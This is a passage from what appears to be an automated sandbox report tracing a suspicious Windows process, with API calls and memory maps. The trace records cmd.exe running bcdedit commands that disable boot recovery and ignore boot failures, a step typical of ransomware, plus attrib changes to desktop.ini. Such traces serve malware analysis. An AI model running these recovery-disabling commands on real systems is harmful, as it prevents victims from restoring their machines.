returned -11 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="FOR") returned -4 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="IF") returned -7 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="REM") returned -16 [0214.580] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0214.580] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.580] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.580] FindClose (in: hFindFile=0x2ae3b0 | out: hFindFile=0x2ae3b0) returned 1 [0214.580] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0214.580] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0214.580] GetConsoleTitleW (in: lpConsoleTitle=0x1cf6b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.581] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf53c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf604 | out: lpAttributeList=0x1cf53c, lpSize=0x1cf604) returned 1 [0214.581] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf53c, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf5fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf53c, lpPreviousValue=0x0) returned 1 [0214.581] GetStartupInfoW (in: lpStartupInfo=0x1cf4f8 | out: lpStartupInfo=0x1cf4f8*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0214.581] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.581] CreateProcessW (in: 
lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit.exe /set {default} recoveryenabled no ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1cf598*(cb=0x48, lpReserved=0x0, lpDesktop="", lpTitle="bcdedit.exe /set {default} recoveryenabled no ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf5e4 | out: lpCommandLine="bcdedit.exe /set {default} recoveryenabled no ", lpProcessInformation=0x1cf5e4*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb58, dwThreadId=0xec0)) returned 1 [0214.618] CloseHandle (hObject=0x50) returned 1 [0214.618] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.618] GetEnvironmentStringsW () returned 0x2b2250* [0214.619] FreeEnvironmentStringsW (penv=0x2b2250) returned 1 [0214.619] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0214.738] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1cf4d8 | out: lpExitCode=0x1cf4d8*=0x0) returned 1 [0214.738] CloseHandle (hObject=0x4c) returned 1 [0214.738] _vsnwprintf (in: _Buffer=0x1cf620, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf4e4 | out: _Buffer="00000000") returned 8 [0214.738] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0214.738] GetEnvironmentStringsW () returned 0x2b2250* [0214.738] FreeEnvironmentStringsW (penv=0x2b2250) returned 1 [0214.738] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.739] GetEnvironmentStringsW () returned 0x2b2250* [0214.739] FreeEnvironmentStringsW (penv=0x2b2250) returned 1 [0214.739] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf53c | out: lpAttributeList=0x1cf53c) [0214.739] GetConsoleTitleW (in: 
lpConsoleTitle=0x1cf920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.739] GetFileAttributesW (lpFileName="bcdedit.exe" (normalized: "c:\\windows\\system32\\bcdedit.exe")) returned 0x20 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="DIR") returned -2 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="ERASE") returned -3 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="DEL") returned -2 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="TYPE") returned -18 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="COPY") returned -1 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="CD") returned -1 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="CHDIR") returned -1 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="RENAME") returned -16 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="REN") returned -16 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="ECHO") returned -3 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="SET") returned -17 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="PAUSE") returned -14 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="DATE") returned -2 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="TIME") returned -18 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="PROMPT") returned -14 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="MD") returned -11 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="MKDIR") returned -11 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="RD") returned -16 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="RMDIR") returned -16 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="PATH") returned -14 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="GOTO") returned -5 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="SHIFT") returned -17 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="CLS") returned -1 [0214.740] _wcsicmp (_String1="bcdedit.exe", 
_String2="CALL") returned -1 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="VERIFY") returned -20 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="VER") returned -20 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="VOL") returned -20 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="EXIT") returned -3 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="SETLOCAL") returned -17 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="ENDLOCAL") returned -3 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="TITLE") returned -18 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="START") returned -17 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="DPATH") returned -2 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="KEYS") returned -9 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="MOVE") returned -11 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="PUSHD") returned -14 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="POPD") returned -14 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="ASSOC") returned 1 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="FTYPE") returned -4 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="BREAK") returned -15 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="COLOR") returned -1 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="MKLINK") returned -11 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="DIR") returned -2 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="ERASE") returned -3 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="DEL") returned -2 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="TYPE") returned -18 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="COPY") returned -1 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="CD") returned -1 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="CHDIR") returned -1 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="RENAME") returned -16 [0214.741] 
_wcsicmp (_String1="bcdedit.exe", _String2="REN") returned -16 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="ECHO") returned -3 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="SET") returned -17 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="PAUSE") returned -14 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="DATE") returned -2 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="TIME") returned -18 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="PROMPT") returned -14 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="MD") returned -11 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="MKDIR") returned -11 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="RD") returned -16 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="RMDIR") returned -16 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="PATH") returned -14 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="GOTO") returned -5 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="SHIFT") returned -17 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="CLS") returned -1 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="CALL") returned -1 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="VERIFY") returned -20 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="VER") returned -20 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="VOL") returned -20 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="EXIT") returned -3 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="SETLOCAL") returned -17 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="ENDLOCAL") returned -3 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="TITLE") returned -18 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="START") returned -17 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="DPATH") returned -2 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="KEYS") returned -9 [0214.741] _wcsicmp (_String1="bcdedit.exe", 
_String2="MOVE") returned -11 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="PUSHD") returned -14 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="POPD") returned -14 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="ASSOC") returned 1 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="FTYPE") returned -4 [0214.742] _wcsicmp (_String1="bcdedit.exe", _String2="BREAK") returned -15 [0214.742] _wcsicmp (_String1="bcdedit.exe", _String2="COLOR") returned -1 [0214.742] _wcsicmp (_String1="bcdedit.exe", _String2="MKLINK") returned -11 [0214.742] _wcsicmp (_String1="bcdedit.exe", _String2="FOR") returned -4 [0214.742] _wcsicmp (_String1="bcdedit.exe", _String2="IF") returned -7 [0214.742] _wcsicmp (_String1="bcdedit.exe", _String2="REM") returned -16 [0214.742] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0214.742] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.742] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.742] FindClose (in: hFindFile=0x2b20a0 | out: hFindFile=0x2b20a0) returned 1 [0214.742] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0214.742] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0214.742] GetConsoleTitleW (in: lpConsoleTitle=0x1cf6b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.743] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf53c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf604 | out: lpAttributeList=0x1cf53c, lpSize=0x1cf604) returned 1 [0214.743] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf53c, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf5fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: 
lpAttributeList=0x1cf53c, lpPreviousValue=0x0) returned 1 [0214.743] GetStartupInfoW (in: lpStartupInfo=0x1cf4f8 | out: lpStartupInfo=0x1cf4f8*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0214.743] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.743] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1cf598*(cb=0x48, lpReserved=0x0, lpDesktop="", lpTitle="bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf5e4 | out: lpCommandLine="bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x1cf5e4*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd08, dwThreadId=0xa8c)) returned 1 [0214.756] CloseHandle (hObject=0x4c) returned 1 [0214.756] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.756] GetEnvironmentStringsW () returned 0x2b2530* [0214.756] FreeEnvironmentStringsW (penv=0x2b2530) returned 1 [0214.757] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0214.983] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cf4d8 | out: lpExitCode=0x1cf4d8*=0x0) returned 1 [0214.983] CloseHandle (hObject=0x50) returned 1 [0214.983] _vsnwprintf (in: _Buffer=0x1cf620, _BufferCount=0x13, 
_Format="%08X", _ArgList=0x1cf4e4 | out: _Buffer="00000000") returned 8 [0214.983] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0214.983] GetEnvironmentStringsW () returned 0x2b2530* [0214.983] FreeEnvironmentStringsW (penv=0x2b2530) returned 1 [0214.984] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.984] GetEnvironmentStringsW () returned 0x2b2530* [0214.984] FreeEnvironmentStringsW (penv=0x2b2530) returned 1 [0214.984] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf53c | out: lpAttributeList=0x1cf53c) [0214.984] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.984] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.984] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.984] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.984] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.984] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.984] SetConsoleInputExeNameW () returned 0x1 [0214.984] GetConsoleOutputCP () returned 0x1b5 [0214.984] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.984] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.985] exit (_Code=0) Process: id = "323" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16dc0" os_pid = "0xb7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "321" os_parent_pid = "0xb9c" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This 
Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24687 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24688 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24689 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24690 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 24691 start_va = 0x610000 end_va = 0x616fff entry_point = 0x610000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 24692 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24693 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24694 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24695 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 24696 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24697 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name 
= "pagefile_0x0000000000010000" filename = "" Region: id = 24698 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24699 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24700 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 24701 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 24702 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 24703 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24704 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24705 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24706 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24707 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = 
"\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24708 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24709 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24710 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24711 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24712 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24713 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24714 start_va = 0x2a0000 end_va = 0x367fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24715 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24716 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 
437 os_tid = 0xc00 Process: id = "324" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16dc0" os_pid = "0xbfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "321" os_parent_pid = "0xb9c" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24727 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24728 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24729 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24730 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 24731 start_va = 0x800000 end_va = 0x806fff entry_point = 0x800000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 24732 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24733 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = 
"apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24734 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24735 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 24736 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24737 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24738 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24739 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24740 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 24741 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 24742 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 24743 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24744 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" 
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24745 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24746 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24747 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24748 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24749 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24750 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24751 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24752 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = 